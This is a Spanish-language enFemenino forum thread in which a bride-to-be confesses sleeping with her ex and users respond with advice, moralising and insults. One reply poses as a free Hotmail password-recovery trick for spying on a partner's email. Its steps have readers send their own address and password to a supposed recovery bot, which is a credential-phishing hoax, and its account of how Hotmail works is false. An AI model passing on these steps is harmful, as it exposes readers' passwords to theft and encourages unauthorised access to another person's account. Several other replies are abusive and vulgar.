en

Comunidad
Todo
Lo mejor
Nuestra selección

◀ 

Descubre nuestros artículos:
Pareja: fingir el orgasmo Pareja: ¿Finges el orgasmo?Seducción: mantener el amor en la parejaPareja: ¡Devuélvele la chispa!Relación en el trabajo: ligue en la oficinaLigue en la oficina: ¿amor, sexo o pasión?

Mensaje que originó la charla:

A noche fui infiel

Me voy a casar en diciembre. A noche me despedí de mi novio como de costumbre le mande un mensajito le dije que me iba a dormir me fui a duchar al salir del baño me prepare para dormir y cuando ya estaba a costada en mi cama mi celu sonó era mi ex el amor de mi vida!!!!!!!!!! El que me había dejado el que juega con mis sentimientos cuando quiere Dios hablamos nos dijimos muchas cosas me izó llorar, el lloro los dos estamos con otras personas fue terrible y le dije que si quería venir y habláramos cuando llego el corazón se me iba salir llego rápido nos vimos a los ojos hablamos y entre una cosas y otra hicimos el amor me dijo que me amaba yo lo amooooooo pero no podemos estar juntos yo lo se y ya me decidí pero no dejo de pensar en el necesitaba desahogarme gracias!!!!!!!!!!!!!

Lista de respuestas:
Contenido de las respuestas:

Se discreta

puedes, pero con mucha disclecion ser su amante, pues todo es buscar los sitios de encuentro y momentos. pero te adbierto que eso es jugar con polbora, tu misma.

¡ y que !

Yo mismo hace muchos años ,fui parte de la diversion o asignatura pendiente que teniamos ,y la recuperamos la semana antes de casarse.Y la verdad la boda fue divertidisima , ella guapisima y de nuestro nuestra noche loca ,no se ha vuelto hablar,se quedo en un guiño de ojo cuando salia de la iglesia ,y eso que nos seguimos viendo muy a menudo.
Tampoco has hecho nada que sin ser habitual, tampoco es anormal.

Julian623

Ver para creer

NOOOOOOOOOO QUE PINCHE VIOLENCIA, CUANTA PUTERIA HAY EN TI. NO LO PUEDO CREER BAÑATE CON AGUA BENDITA, NO QUISIERA ESTAR EN EL PELLEJO DE TU NOVIO. ME DA ASCO SEGUIR ERSCRIBIENDO MEJOR ME GUARDO LO QUE PIENSO DE TI. PODRIA OFENDERTE DEMASIADO, O TALVEZ NO, VEO QUE TU MORAL ESTA POR LOS SUELOS. QUE GACHO!!!!!!

Meapilas barato, vomita su propia bilis!

...que conio haces tu metido en este foro, duvalier.

...eres un meapilas, un reprimido y un morboso.....

...bañarse en agua bendita....será capullo!...

El leon piensa que todos son de su misma condicion

ESTOYDISPUESTO, NO ME DOY BAÑOS DE PUREZA PORQUE E VIVIDO EN CARNE PROPIA LO QUE ES UNA INFIDELIDAD, NO COMPARTO EL BUEN SENTIR DE LA AMIGA QUE A UNOS MESES DE CASARSE SE HAYA REVOLCADO CON OTRO. IMAGINATE SI ES ASI AHORA COMO SERA CUANDO YA HAYA AMARRADO A SU PAREJA. ME ASQUE PENSAR QUE AUN EXISTEN MUJERES ASI CON BAJA AUTOESTIMA DE ELLAS MISMAS Y UNA MORAL POR LOS SUELOS. A QUIEN LE GUSTA DIME QUE LE PINTEN LOS CUERNOS. A TI SI.???? LO RESPETO

Si quieres saber si te engañan revisa su mail

PARA LA MUJER QUE NO SE HAYA ENTERADO DE ESTO AUN SOLO LES DIGO QUE NO PAGUEN POR QUE UNA PERSONA LES DIGA LA CONTRASEÑA DE OTRA PERSONA. PORQUE ELLOS SEGURAMENTE LO HACEN DE ESTA MANERA Y ENCIMA LE COBRAN DINERO A USTEDES POR UNA COSA QUE VOSOTROS PUEDEN HACER GRATIS .ESTOY CANSADA DE QUE LA GENTE SE APROVECHE DE OTRA GENTE. POR ESO OS DIGO EL TRUCO DE LAS CONTRASEÑAS GRATIS.

El método utilizado por http://www.hotmail.com para dar una contraseña perdida es
utilizar el asistente de su web pero lo que realmente hace es acceder a un 'bot' que
lo unico que hace es enviar un email al correo de contacto de la persona que se lo
ha olvidado asegurando asi la privacidad. Pero lo que no todo el mundo sabe es que
este proceso (normalmente realizado desde la web) no es mas que un envio a...
webpass-recovery@hotmail.com con un formato preestablecido Y AQUI ESTA EL TRUCO!!
---
|
---> prv (pass recovery - en español: RECUPERA PASSWORD)

Todo consiste en enviar un email...

**********PASO 1:

En el campo para: escribiremos EN MINUSCULAS:

webpass-recovery@hotmail.com

**********PASO 2:

En el campo Asunto escribiremos TAL CUAL ESCRIBO:

PassRecovery_mail_MSN

**********PASO 3:

EN LA PRIMERA LINEA (IMPORTANTE QUE SEA LA PRIMERA LINEA DEL CUERPO
DEL MENSAJE) Escribiremos lo siguiente:

USR_RCVR:nombredelavictima@hotmail.com

**********PASO 4:

EN LA QUINTA LINEA HAS DE PONER LO SIGUIENTE (recuerda la QUINTA LINEA) :

REDIRECT_TO:tu_email@hotmail.com:tucontraseña

* LA SEGUNDA Y TERCERA LINEA DEBEN SER SIMPLES INTROS (o sea en blanco) y la cuarta TODO 7 (TODA LA LINEA QUE NO FALTE NINGUN NUMERO)
****************************** ******************** ****************************** ******************** *************

Una explicaccion a todo esto es la siguiente. Al mandar un email al bot desde la
web oficial los mensajes de reenvio de pasword tienen un formato preestablecido
por lo que al cambiarlo se le va un poco... el campo REDIRECT_TO lo que hace es redireccionar
la salida del mesaje iniciando sesion en nuestra cuenta depositando suavemente,
amigablemente, esquisitamente la contraseña de la victima en nuestro amado buzon de correo.
Normalmente suele tardar entre 24 y 48 horas en llegar, asi que hay que tener un poco de paciencia.

Disfrutalo, este truco sustituye al anterior, recuerda que sirve tanto para dominios
hotmail como para dominios Msn, hasta que los chapuceros de Microsoft se vuelvan a dar
cuenta.

Que mala onda amix

que mala onda ocea si no lo quieres por que jugar con los sentimientos de los demas deverias ponerte a pensar por que cortaron ocea fue por algo no pero es lo que quisiste hacer ahora solo habla con el y dile que no lo quieres te gustaria que esto que tu hiciste el te lo hubiera hecho que sentirias se honesta va t.q bye

Maaaaal

Desde que estás enamorada de otro eres infiel, no se necesita tirarse al tipo para serle infiel a tu novio, qué poca!

Pasión

nunca he sido infiel a mi marido, per quiza sea el momento, hemos llegado a un punto que nos conocemos tanto que ya no nos sorprendemos, y cuando otro hombre me susurra "que guapa estàs" siento costiquillas en el estomago. Amo a mi marido, per quizà necesitemos un poco de pasión y con él cada día es mas difícil.

No te lo recomiendo

HOLA: DEJAME DECIRTE K YO PENSABA KMO TU, Y KMO HABIA UN CHAVO POR AHI K ME BUSCABA Y ME HABLABA BONITO, Y HOY HICIMOS EL AMOR, Y NI LO DISFRUTE POR ESTAR PENSANDO EN LA CULPA, Y DESPUES DE ESO ME SENTI DE LO PEOR, ASI K NO FUE KMO YO ME IMAGINE, SOLO ME SIENTO LA PEOR DE LAS MUJERES, BUENO ES UN CONSEJO K TE DOY, TAL VEZ A TI TE PASE DIFERENTE. PERO AL MENOS MI MARIDO ME HIZO SENTIR MAS MUJER K EL CHIKO KN EL K LO ENGAÑE, LA VERDAD SOLO ME DI CUENTA QUE MI ESPOSO ES INCOMPARABLE. CUIDATE BYE

Guera861

MIRA YO TUVE UN NOVIO AL QUE ADORE AVECES LO VEO PERO POR CASUALIDAD PERO EN LA CALLE NO NOS HABLAMOS PORQUE YO YA ESTOY CASADA Y CREO QUE DEBO RESPETAR A MI PAREJA. TENGO DOS HIJOS. ADORO A MIS HIJOS PERO AUNQUE QUIERO A MI ESPOSO NO PUEDO OLVIDAR A MI EX SIENTO QUE NUNCA HABIA AMADO A NADIE COMO A MI EX TALVEZ ME EQUIVOQUE PORQUE NO SIENTO AMAR TANTO A MI ESPOSO COMO A MI EX PERO MI ESPOSO ME QUIERE Y ES MUY BUEN ESPOSO. SI PUDIERA REGRESAR PARA ATRAS EL TIEMPO YO HUBIERA ELEGIDO AL VERDADERO AMOR DE MI VIDA. PIENSALO BIEN AVECES EL CORAZON NOS ENGANA Y TOMAMOS DECICIONES QUE LUEGO TE ARREPIENTES PERO NO HACES NADA POR NO LASTIMAR A LA PERSONA CON LA QUE VIVES. YO TENGO 21 ANOS Y CREEME QUE CREO QUE YA HE MADURADO Y AHORA LLORO POR NO HABER ELEGIDO BIEN. TOMATE UN BREAK Y PIENSALO BIEN A QUIEN VERDADERAMENTE AMAS NO COMETAS UN ERROR DE CASARTE CON ALGUIEN A QUIEN NO SABES SI SIENTES AMOR VERDADERO O SI SOLAMENTE ES PARA VENGARTE DE TU EX QUE TE HISO MUCHAS COSAS. ESTE ES MI MEJOR CONSEJO PARA TI. ESPERO OIR PRONTO DE TI PARA SABER QUE DECISION TOMASTE EN TU VIDA O TALVEZ NO ESTES LISTA PARA DAR ESE GRAN PASO EN TU VIDA QUE ES EL DEL MATRIMONIO.

Guera861

hola a todos por aqui!!!!!!!!!!!!!

Mucho tiempo

Alguien en el foro tiene muchooooo tiempo libre! que se dedica a subir post viejisimos, que desocupe, ¡vaya porque para mirar de pagina en pagina! y este no es el unico que he visto por aqui.

Aclaro

este post es mas viejo que la "tana"es de junio de 2005, ha podido tener una hijo ya del desliz jajajaja. saludo al foro

Tranquilizate

no te preocupes amiga tu solo te dejastes llevar por lo que tenias dentro y el tambien tomalo como una despedida

Necesitas tratamiento

El deseo nunca debería ganar a la razon.

El control y compromiso de pareja es fundamental no hay excusas .. "fue mi ex-novio...estaba confundida... habia tomado... yo no queria ....huy se me cayo el calzon.. etc etc"

Creo que lo volveras a hacer. Solo te digo que leas, te informes acerca del daño que le causaras y el daño que propinaras a tu relacion si se llega a enterar, tal vez asi te controles.

Un psicoterapeuta te ayudara a controlarte identificando tu problema y ayudante a manejarlo.

juan

...

ESO ES HASTA CIERTO PUNTO NO NORMAL PERO COMPRENSIBLE, pero yo lo que queria preguntarte es que si tu ex, como tu dices es el maro de tu vida, no entiendo que te cases en diciembre con tu novio. Si es el amor de mi vida, primero tiene que dejar de serlo y luego encontrar o que surga relamente el amor de mi vida, porque si ya no estabais juntos es que relamente NO ERA EL AMOR DE TU VIDA NO ???? Si crees que el amor de tu vida es tu EX no te cases con tu novio, lucha por tu ex, exté con quién esté. EL AMOR MUEVE MONTAÑAS Y RECUERDA QUE SÓLO SE VIVE UNA VEZ. NO ESTÉS CON UN HOMBRE SABIENDO QUE EL HOMBRE DE TU VIDA ES OTRO. yo no podria.

UN SALUDO Y ESPERO TE VAYA BIEN.

Tranquila mujer..

Cuando lo hacemos nosotras, lo miran mal, pero cuando lo hacen ellos, venga...somos machos, el hombre es hombre...

Y si hubiera sido el, pues no pasa nada, para eso es hombre con un rabo entre las piernas...

tuviste un dezl...y punto...a cualquiera nos pasa..besos

Hola

mira amiga lo unico q tienes q hacer es tratar de olvidar lo q paso con tu ex pareja ; te entiendo volvistes a sentir muchas cosas q en su tiempo lo sentias o tu crees sentirlo no dejes q te confunda no retrocedas te estas confundiendo. tu crees amarlo pero solo vivistes el momento nada mas y despues q el va queres repetir la escena y tu serias tonta si lo permites balora muchas cosas de tu pareja actual y encontraras muchas diferencias.
recuerda no te dejes confundir .
atentamente patricia

Lo quese hace bien que se paga y luego sale peor

yo engañe a mi novio con su peor enemigo pero yo no sostuve ninguna relacion sexual con el no me hubiera atrevido larazon fue que elera muy distante yo queria sentirme importante sali perdiendo ely se entero cambio mucho conmigo se ocupaba mucho de mi, pero elrencor estaba siempre presente despues de año y medio sali embarazada nos casamos por el civil y justo faltando 15días para la ceremonia de la iglesia me dijo que habia cometidoun error se acosto con unazorramaldita que segun era su amiga no confien enlas amigas por muy confidentes quesean y estabatambien embarazada el nunaca estuvo seguro que fuera su hijo ya que tenia novio no me engaño desde un principio solo fue una noche y en una silla pedi detalles estamos hoy casados enmendando los errores y sacando al quesi es su hijo o sea mi a mi niño adelante espero seamos felices y si amas al a persona notecases sino seras infeliz quieres engañar a tu marido o que te hagan lo mismo que a mi solo si amas y no te das por vencida perdonas el error que cometio en ese entonces mi novio pero recuerda que todo lo que se hace se paga.

◀  Arriba de la página

Ya no aguanto mas!!! Me juro por su hijo que no tiene otraTerminamos y se demoró 3 semanas en estar con otro que me aconsejan Consejos para saber si te engañan.Fui la "amante" ahora soy la esposaYo tambien me quiero vengar...pero de mi exChico atractivo busca chica atrevida con pareja Necesito consejos de amantes Ser amante es más fácil que ser espos@ (o descubriendo el hilo negro) ser amantee no es tan faciil
Lista de las 10 charlas precedentes : 

Enviar/compartir esta página : 

Actualmente en pareja
¿Tenemos que dar el primer paso...
Lencería sexy para noches tórridas
Pareja: ¡Devuélvele la chispa!
Ligue en la oficina: ¿amor, sexo...
Test: ¿Es amor o deseo?
Fichas prácticas pareja
¿Qué hacer cuando el preservativo...
El himen
¿Qué hacer en caso de una penetrac...
Optar por la abstinencia
El kamasutra
Famosos en enFemenino
Jackson Rathbone
Luis Figo
Renée Zellweger
Sheryl Crow
Tom Welling
Foros pareja
Infidelidad
Fantasías sexuales
Contracepción
Intercambio de parejas - Tríos
Pareja - Psicología - Relaciones
Ver también: Sexo & Couple - Liebe & Sex - Sesso & Coppia - Love & Sex - Love & Sexo

Copyright © 1999-2009 enFemenino.com
Grupo auFeminin: auFeminin - enFemenino - alFemminile - goFeminin - soFeminine - Teemix - Joyce - Voyage Bons Plans - Santé AZ - Marmiton - Marmiton.es - Marmiton.it - Marmikid - Tiboo - Recettes de Valérie - Noms de famille - Toutes les villes - Parcours-Gourmand - Onmeda - HerVietnam